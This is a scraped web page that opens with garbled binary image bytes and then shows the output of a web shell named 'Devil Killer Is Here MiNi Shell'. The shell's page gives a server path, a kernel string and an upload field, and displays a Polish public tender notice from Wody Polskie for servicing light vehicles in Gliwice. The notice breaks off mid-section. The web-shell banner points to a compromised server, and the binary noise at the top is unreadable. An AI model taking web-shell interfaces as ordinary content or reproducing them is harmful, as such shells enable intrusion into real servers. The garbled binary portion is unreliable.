JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20250227/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20250227/0012424801-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Serwis samochodów osobowych i dostawczych o DMC poniżej 3,5 tony<br/>na potrzeby RZGW w Gliwicach </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Państwowe Gospodarstwo Wodne Wody Polskie</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 368302575</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Żelazna 59a</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Warszawa</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">00-848</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">mazowieckie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL911 - Miasto Warszawa</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">gliwice@wody.gov.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://www.gov.pl/web/wody-polskie</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - osoba prawna, o której mowa w art. 4 pkt 3 ustawy (podmiot prawa publicznego)</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Środowisko</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Serwis samochodów osobowych i dostawczych o DMC poniżej 3,5 tony<br/>na potrzeby RZGW w Gliwicach </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-34656324-3ab5-496f-86ce-04f873429884</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00124248</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-02-27</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2025/BZP 00112251/01/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.95 Serwis samochodów osobowych i dostawczych o DMC poniżej 3,5 tony na potrzeby RZGW w Gliwicach</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://przetargi.wody.gov.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://przetargi.wody.gov.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. Zgodnie z art. 61 ust. 1 ustawy Pzp,<br/>komunikacja między Zamawiającym a Wykonawcami odbywa się w formie elektronicznej, za pośrednictwem Platformy Zakupowej –<br/>zwanej dalej „Platformą” – pod adresem: https://przetargi.wody.gov.pl/.<br/>2. Korzystanie z Platformy jest nieodpłatne. Instrukcja korzystania z Platformy znajduje się pod adresem: www.przetargi.wody.gov.pl<br/>w zakładce: Instrukcja dla Wykonawców.<br/>3. Korzystanie z Platformy nie wymaga zarejestrowania konta na Platformie.<br/>4. Dokumenty związane z postępowaniem Zamawiający zamieszcza na Platformie w zakładce z przedmiotowym postępowaniem.<br/>5. Celem skomunikowania się z Zamawiającym (z wyłączeniem złożenia oferty oraz dokumentów lub oświadczeń składanych razem<br/>z ofertą, których sposób złożenia został opisany w pkt 14.1 – 14.6 specyfikacji warunków zamówienia, zwanej dalej „SWZ”),<br/>Wykonawca korzysta z zakładki „Zapytaj”. Zakładka ta służy również Zamawiającemu do komunikacji z Wykonawcami.<br/>6. Za datę wpływu wszelkiej korespondencji do Zamawiającego, w tym złożenia oferty oraz dokumentów lub oświadczeń składanych<br/>razem z ofertą, uważa się datę wczytania korespondencji na Platformie.<br/>7. Wykonawca może zwrócić się do Zamawiającego o wyjaśnienie treści SWZ. Zamawiający jest obowiązany udzielić wyjaśnień<br/>niezwłocznie, jednak nie później niż na 2 dni przed upływem terminu składania ofert, pod warunkiem że wniosek o wyjaśnienie treści<br/>SWZ wpłynął do zamawiającego nie później niż na 4 dni przed upływem terminu składania ofert.<br/>8. Jeżeli Zamawiający nie udzieli wyjaśnień w terminie, o którym mowa w pkt. 3.7, przedłuży termin składania ofert o czas niezbędny<br/>do zapoznania się wszystkich zainteresowanych Wykonawców z wyjaśnieniami niezbędnymi do należytego przygotowania i złożenia<br/>ofert.<br/>9. Treść wszystkich zapytań wraz wyjaśnieniami, Zamawiający udostępni/bez ujawniania źródła zapytania/na stronie internetowej<br/>prowadzonego postępowania, na której SWZ jest udostępniona. W przypadku rozbieżności pomiędzy treścią SWZ, a treścią<br/>udzielonych odpowiedzi, jako obowiązującą należy przyjąć treść pisma zawierającego późniejsze wyjaśnienia/oświadczenie<br/>Zamawiającego.<br/>10. Wszelkie wyjaśnienia, modyfikacje treści SWZ oraz inne informacje związane z niniejszym postępowaniem Zamawiający będzie<br/>zamieszczał wyłącznie na Platformie zakupowej w zakładce z przedmiotowym postępowaniem.<br/>11. Zamawiający zaleca sporządzenie korespondencji w następujących formatach: .doc., docx, .rtf, pdf, .xls.<br/>12. Zamawiający informuje, że adres e-mail: gliwice@wody.gov.pl oraz zamowienia.rzgwgliwice@wody.gov.pl wskazany w<br/>ogłoszeniu o zamówieniu, służy jedynie do przesyłania ogłoszeń i otrzymywania informacji zwrotnej z Dziennika Urzędowego Unii<br/>Europejskiej. Nie jest to adres do komunikacji z Wykonawcami.<br/>13. Maksymalny rozmiar plików przesyłanych za pośrednictwem Platformy wynosi 150 MB.<br/>14. Dokumenty elektroniczne, oświadczenia lub cyfrowe odwzorowania dokumentów lub oświadczeń składane są przez Wykonawcę<br/>za pośrednictwem Platformy jako załączniki.<br/>15. Sposób sporządzenia dokumentów elektronicznych, oświadczeń lub cyfrowych odwzorowań dokumentów lub oświadczeń musi<br/>być zgody z wymaganiami określonymi w rozporządzeniu Prezesa Rady Ministrów dnia 30 grudnia 2020 r. w sprawie sposobu<br/>sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji<br/>elektronicznej w<br/>postępowaniu o udzielenie zamówienia publicznego lub konkursie oraz rozporządzeniu Ministra Rozwoju, Pracy i Technologii z dnia<br/>23 grudnia 2020 r. w sprawie podmiotowych środków dowodowych oraz innych dokumentów lub oświadczeń, jakich może żądać<br/>zamawiający od wykonawcy</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1. Informacja dotycząca przetwarzania danych osobowych. Zgodnie z art. 13 ust. 1 i<br/>2rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w<br/>związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy<br/>95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1), dalej „RODO”, informuję, że:<br/>a) administratorem Pani/Pana danych osobowych jest Państwowe Gospodarstwo Wodne Wody Polskie z siedzibą w Warszawie przy<br/>ul. Żelaznej 59A, 00-848 Warszawa, REGON: 368302575, NIP: 527-282-56-16;<br/>b) kontakt z Inspektorem ochrony danych w PGW WP możliwy jest pod adresem e-mail: iod@wody.gov.pl;<br/>c) Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z niniejszym<br/>postępowaniem o udzielenie zamówienia publicznego prowadzonym na podstawie ustawy z dnia 11 września 2019 r. Prawo<br/>zamówień publicznych;<br/>d) odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania,<br/>e) Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 ustawy z dnia 11 września 2019 r. Prawo zamówień<br/>publicznych, przez okres 4 lat licząc od końca roku kalendarzowego, w którym zakończono postępowanie o udzielenie zamówienia,<br/>a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy;<br/>f) obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym<br/>określonym w przepisach ustawy z dnia 11 września 2019 r. Prawo zamówień publicznych, związanym z udziałem w postępowaniu<br/>o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z ustawy z dnia 11 września 2019 r.<br/>Prawo zamówień publicznych;<br/>g) w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosowanie do art.<br/>22 RODO.<br/>h) posiada Pani/Pan:<br/>-na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących;<br/>-na podstawie art. 16 RODO prawo do sprostowania lub uzupełnienia Pani/Pana danych osobowych (skorzystanie z prawa do<br/>sprostowania lub uzupełnienia nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia publicznego ani zmianą<br/>postanowień umowy w zakresie niezgodnym z przepisami ustawy z dnia 11 września 2019 r. Prawo zamówień publicznych oraz nie<br/>może naruszać integralności protokołu oraz jego załączników);<br/>-na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem<br/>przypadków, o których mowa w art. 18 ust. 2 RODO (prawo do ograniczenia przetwarzania nie ma zastosowania w odniesieniu do<br/>przechowywania, w celu ochrony praw innej osoby fizycznej lub prawnej, lub z uwagi na ważne względy interesu publicznego Unii<br/>Europejskiej lub państwa członkowskiego);<br/>-prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uznają Państwo, że przetwarzanie danych<br/>osobowych Państwa dotyczących narusza przepisy RODO<br/>i) nie przysługuje Państwu:<br/>-w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>-prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>-na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania<br/>Państwa danych osobowych jest art. 6 ust. 1 lit. c RODO.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">C.ROZ.2710.7.2025.MJ</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.5.) Wartość zamówienia: <span class="normal"> 218751,30 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">4</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Serwis samochodów osobowych i dostawczych o DMC poniżej 3,5 tony użytkowanych w RZGW GLIWICE </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 69154,35 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">50112100-4 - Usługi w zakresie napraw samochodów</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> Zamawiający przewiduje zastosowanie prawa opcji, polegającego na: <br/>1)	świadczeniu usług zgodnie z Umową po cenach określonych w ofercie Wykonawcy, po zakończeniu pierwotnego terminu realizacji Umowy (12 miesięcy) przez okres nie dłuższy niż 12 miesięcy, <br/>2)	zwiększeniu zakresu zobowiązania umownego, tj. dodatkowej realizacji usług w zakresie wskazanym w formularzu ofertowym, po cenach określonych w ofercie Wykonawcy, które nie przekroczy 20 % wartości maksymalnej całkowitej wartości umowy w ramach zamówienia podstawowego,<br/>3)	Zamawiający może skorzystać w obu wariantów prawa opcji tak łącznie, jak i każdego z osobna według własnego wyboru.<br/>4)	W celu skorzystania z prawa opcji, o którym mowa w ust. 2 pkt 1 Zamawiający przekaże Wykonawcy oświadczenie w formie pisemnej w terminie nie krótszym niż 10 dni przed terminem zakończenia terminu podstawowego, ze wskazaniem okresu o jaki zostanie przedłużony termin wykonania Umowy.<br/>5)	W celu skorzystania z prawa opcji, o którym mowa w ust. 2 pkt 2 Zamawiający przekaże Wykonawcy oświadczenie w formie pisemnej, w terminie obowiązywania Umowy (termin podstawowy i termin z opcji), o potrzebie realizacji dodatkowych usług w ramach prawa opcji.<br/>6)	Wykonawca po otrzymaniu informacji, o której mowa w ust. 4 i/lub ust. 5 zobowiązany będzie do świadczenia usług na zasadach określonych w Umowie.<br/>7)	Zamawiający zastrzega, iż część zamówienia określona jako prawo opcji jest uprawnieniem, a nie zobowiązaniem Zamawiającego. Realizacja opcji może, ale nie musi nastąpić, wyłącznie w zależności od zapotrzebowania i możliwości finansowych Zamawiającego i na skutek jego dyspozycji w tym zakresie. Brak realizacji zamówienia w tym zakresie nie będzie rodzić żadnych roszczeń ze strony Wykonawcy w stosunku do Zamawiającego.<br/>8)	Kwota prawa opcji: 53 812,82 zł brutto <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Ocenie będą podlegały oferty ważne tj. oferty niepodlegające odrzuceniu.<br/>2.Oferty oceniane będą na podstawie następujących kryteriów:<br/>2.1 cena brutto – waga 60 %<br/>2.2 termin przyjęcia pojazdu– waga 40 %<br/>oddzielnie dla każdej części zamówienia.<br/>3. Ocena ofert zostanie dokonana wg poniższego wzoru:<br/>P = Pc + Pt<br/>gdzie:<br/>P – łączna liczba punktów przyznanych badanej ofercie,<br/>Pc – liczba punktów w kryterium „cena brutto”,<br/>Pt – liczba punktów w kryterium „termin przyjęcia pojazdu”.<br/>4. Ocena w poszczególnych kryteriach dokonywana będzie na poniższych zasadach:<br/>4.1 Każda z ważnych ofert będzie punktowana w kryterium określonym<br/>w pkt 15.2.1 SWZ poprzez porównanie ceny brutto oferty badanej dla danej części zamówienia do ceny brutto najniższej ze<br/>wszystkich ważnych ofert dla danej części zamówienia, wg poniższego wzoru:<br/>Pc = (Cn : Cb) x 60<br/>gdzie:<br/>Cn – cena brutto najniższa spośród wszystkich ofert podlegających ocenie,<br/>Cb – cena brutto oferty badanej.<br/>4.2 Każda z ważnych ofert będzie punktowana w kryterium określonym<br/>w pkt 15.2.2 SWZ poprzez przyznanie punktów za zaoferowany termin przyjęcia pojazdu w następujący sposób:<br/>Kryterium „Termin przyjęcia pojazdu ”<br/>- 40 punktów za przyznanie do 2 dni roboczych<br/>- 20 punktów za przyznanie 3-4 dni roboczych<br/>- 0 punktów za przyznanie 5 dni roboczych<br/>Zaoferowanie przyjęcia pojazdu do naprawy w terminie dłuższym niż 5 dni roboczych spowoduje odrzucenie oferty jako niezgodnej z<br/>SWZ, na podstawie art. 226 ust, 1 pkt 5 ustawy Pzp.<br/>Liczba dni roboczych liczona jest od przekazania przez Zamawiającego zamówienia drogą elektroniczną (platforma internetowa) do<br/>momentu potwierdzenia odbioru przez Zamawiającego.<br/>Minimalny termin przyjęcia pojazdu do warsztatu wynosi 1 dzień roboczy, maksymalny termin wynosi 5 dni roboczych. W przypadku<br/>niewskazania przez Wykonawcę w Formularzu oferty żadnego terminu, Zamawiający uzna, że Wykonawca zaoferował maksymalny<br/>wskazany przez Zamawiającego termin i przyzna 0 punktów.<br/>Za dzień roboczy rozumie się dzień od poniedziałku do piątku.<br/>Zamawiający udzieli niniejszego zamówienia temu Wykonawcy, który otrzyma najwyższą liczbę punktów.<br/>Jeżeli Zamawiający nie może dokonać wyboru oferty najkorzystniejszej ze względu na to, że dwie lub więcej ofert przedstawia taki<br/>sam bilans ceny<br/>i innych kryteriów oceny ofert, Zamawiający spośród tych ofert wybiera ofertę z najniższą ceną.<br/>Cena podana w Formularzu ofertowym jest ceną ostateczną, niepodlegającą negocjacji i wyczerpującą wszelkie należności<br/>Wykonawcy wobec Zamawiającego związane z realizacją przedmiotu zamówienia.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin przyjęcia pojazdu</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Serwis samochodów osobowych i dostawczych o DMC poniżej 3,5 tony użytkowanych w RZGW GLIWICE – Zarząd Zlewni w Gliwicach </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 65040,65 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">50112100-4 - Usługi w zakresie napraw samochodów</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> Zamawiający przewiduje zastosowanie prawa opcji, polegającego na: <br/>1)	świadczeniu usług zgodnie z Umową po cenach określonych w ofercie Wykonawcy, po zakończeniu pierwotnego terminu realizacji Umowy (12 miesięcy) przez okres nie dłuższy niż 12 miesięcy, <br/>2)	zwiększeniu zakresu zobowiązania umownego, tj. dodatkowej realizacji usług w zakresie wskazanym w formularzu ofertowym, po cenach określonych w ofercie Wykonawcy, które nie przekroczy 20 % wartości maksymalnej całkowitej wartości umowy w ramach zamówienia podstawowego,<br/>3)	Zamawiający może skorzystać w obu wariantów prawa opcji tak łącznie, jak i każdego z osobna według własnego wyboru.<br/>4)	W celu skorzystania z prawa opcji, o którym mowa w ust. 2 pkt 1 Zamawiający przekaże Wykonawcy oświadczenie w formie pisemnej w terminie nie krótszym niż 10 dni przed terminem zakończenia terminu podstawowego, ze wskazaniem okresu o jaki zostanie przedłużony termin wykonania Umowy.<br/>5)	W celu skorzystania z prawa opcji, o którym mowa w ust. 2 pkt 2 Zamawiający przekaże Wykonawcy oświadczenie w formie pisemnej, w terminie obowiązywania Umowy (termin podstawowy i termin z opcji), o potrzebie realizacji dodatkowych usług w ramach prawa opcji.<br/>6)	Wykonawca po otrzymaniu informacji, o której mowa w ust. 4 i/lub ust. 5 zobowiązany będzie do świadczenia usług na zasadach określonych w Umowie.<br/>7)	Zamawiający zastrzega, iż część zamówienia określona jako prawo opcji jest uprawnieniem, a nie zobowiązaniem Zamawiającego. Realizacja opcji może, ale nie musi nastąpić, wyłącznie w zależności od zapotrzebowania i możliwości finansowych Zamawiającego i na skutek jego dyspozycji w tym zakresie. Brak realizacji zamówienia w tym zakresie nie będzie rodzić żadnych roszczeń ze strony Wykonawcy w stosunku do Zamawiającego.<br/>8)	Kwota prawa opcji: 53 812,82 zł brutto <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: 